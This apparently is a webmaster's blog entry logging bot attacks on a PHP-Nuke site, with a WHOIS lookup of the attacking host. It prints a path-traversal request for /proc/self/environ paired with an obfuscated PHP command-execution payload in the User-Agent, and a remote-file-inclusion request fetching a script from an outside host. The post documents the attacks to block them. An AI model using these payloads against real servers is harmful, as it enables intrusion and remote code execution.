.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1
Agent:
$x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");81.169.152.101 h986442.serverkompetenz.net
Bot atempted to include some script in place of its user agent string.
It then tried to remote load a script.
Blacklist Domain Ban: serverkompetenz.net
.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1
Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank]
81.169.152.101 h986442.serverkompetenz.net
1 comment:
inetnum: 81.169.144.0 - 81.169.156.255
netname: STRATO-RZG-KA
descr: Strato Rechenzentrum, Berlin
country: DE
admin-c: CM265-RIPE
tech-c: XX1-RIPE
tech-c: WB14-RIPE
status: ASSIGNED PA
remarks: in case of spam, attacks from these addresses
remarks: please inform abuse@strato.de
mnt-by: STRATO-RZG-MNT
mnt-lower: STRATO-RZG-MNT
mnt-routes: STRATO-RZG-MNT
source: RIPE # Filtered
person: Christian Mueller
address: Cronon AG
address: Pascalstrasse 10
address: D-10587 Berlin
address: Germany
phone: +49 30 398020
fax-no: +49 30 39802222
abuse-mailbox: abuse@strato.de
nic-hdl: CM265-RIPE
remarks: see also: XX1-RIPE CM5081-NSI CM1-ABC SOUL-RIPE
mnt-by: CRONON-MNT
source: RIPE # Filtered
person: Christian Xaver Mueller
address: Cronon AG
address: Pascalstrasse 10
address: D-10587 Berlin
address: Germany
phone: +49 30 398020
fax-no: +49 30 39 802-222
abuse-mailbox: abuse@strato.de
nic-hdl: XX1-RIPE
remarks: see also: CM265-RIPE SOUL-RIPE
mnt-by: CRONON-MNT
source: RIPE # Filtered
person: Wilhelm Boeddinghaus
address: Strato Rechenzentrum GmbH
address: Pascalstrasse 10
address: D-10587 Berlin
address: Germany
phone: +49 30 39802-0
fax-no: +49 30 39802-222
nic-hdl: WB14-RIPE
remarks: see also INTERNIC: >WB131<
mnt-by: CRONON-MNT
source: RIPE # Filtered
% Information related to '81.169.128.0/18AS6724'
route: 81.169.128.0/18
descr: Strato Rechenzentrum
origin: AS6724
mnt-by: STRATO-RZG-MNT
source: RIPE # Filtered
% Information related to '81.169.144.0/20AS6724'
route: 81.169.144.0/20
descr: Strato Rechenzentrum
origin: AS6724
mnt-by: STRATO-RZG-MNT
source: RIPE # Filtered
Post a Comment